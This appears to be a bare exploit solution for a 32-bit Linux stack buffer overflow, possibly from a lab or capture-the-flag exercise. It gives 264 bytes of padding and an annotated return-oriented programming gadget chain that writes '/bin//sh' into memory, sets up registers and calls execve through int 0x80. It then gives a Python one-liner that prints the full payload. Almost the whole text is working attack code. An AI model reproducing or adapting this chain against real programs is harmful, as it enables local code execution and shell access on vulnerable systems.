"A"*264
+ 0xb7e4404f	pop eax ;ret
+ "/bin"	/bin
+ 0xb7e21a9e	pop edx ;ret
+ 0x0804a014	substracted 4 from address as per requirement by gadget
		address(+4) to write "/bin" to(i.e. 0x0804a018)
+ 0xb7f0a8f9	mov [edx+0x4] eax ;ret
+ 0xb7e4404f	pop eax ;ret
+ "//sh"	
+ 0xb7e21a9e	pop edx ;ret
+ 0x0804a018	substracted 4 from address as per requirement by gadget
+ 0xb7f0a8f9	mov [edx+0x4] eax ;ret
+ 0xb7e9e59f	xor eax eax ; ret ;;
+ 0xb7e21a9e	pop edx ;ret
+ 0x0804a01c	address(+4) to write NULL bytes to.(i.e. 0x0804a020)
+ 0xb7f0a8f9	mov [edx+0x4] eax ;ret
+ 0xb7e4404f	pop eax ;;
+ 0x0804a018	address of /bin//sh
+ 0xb7e21a9e	pop edx ;ret
+ 0x0804a024	address(+4) is the address of address of /bin//sh/(i.e. 0x0804a024)
+ 0xb7f0a8f9	mov [edx+0x4] eax ;ret
+ 0xb7f1da81	pop edx ; pop ecx ; pop ebx ;ret
+ 0x0804a024
+ 0x0804a028
+ 0x0804a018	pointer of string "/bin//sh"
+ 0xb7e9e59f	xor eax eax ; ret ;;
+ 0xb7f693e6	add eax 0xb ;ret
+ 0xb7fdf1b0	int 0x80 ;;


`python -c 'print "A"*264+"\x4f\x40\xe4\xb7"+"/bin"+"\x9e\x1a\xe2\xb7"+"\x14\xa0\x04\x08"+"\xf9\xa8\xf0\xb7"+"\x4f\x40\xe4\xb7"+"//sh"+"\x9e\x1a\xe2\xb7"+"\x18\xa0\x04\x08"+"\xf9\xa8\xf0\xb7"+"\x9f\xe5\xe9\xb7"+"\x9e\x1a\xe2\xb7"+"\x1c\xa0\x04\x08"+"\xf9\xa8\xf0\xb7"+"\x4f\x40\xe4\xb7"+"\x18\xa0\x04\x08"+"\x9e\x1a\xe2\xb7"+"\x24\xa0\x04\x08"+"\xf9\xa8\xf0\xb7"+"\x81\xda\xf1\xb7"+"\x24\xa0\x04\x08"+"\x28\xa0\x04\x08"+"\x18\xa0\x04\x08"+"\x9f\xe5\xe9\xb7"+"\xe6\x93\xf6\xb7"+"\xb0\xf1\xfd\xb7"'`
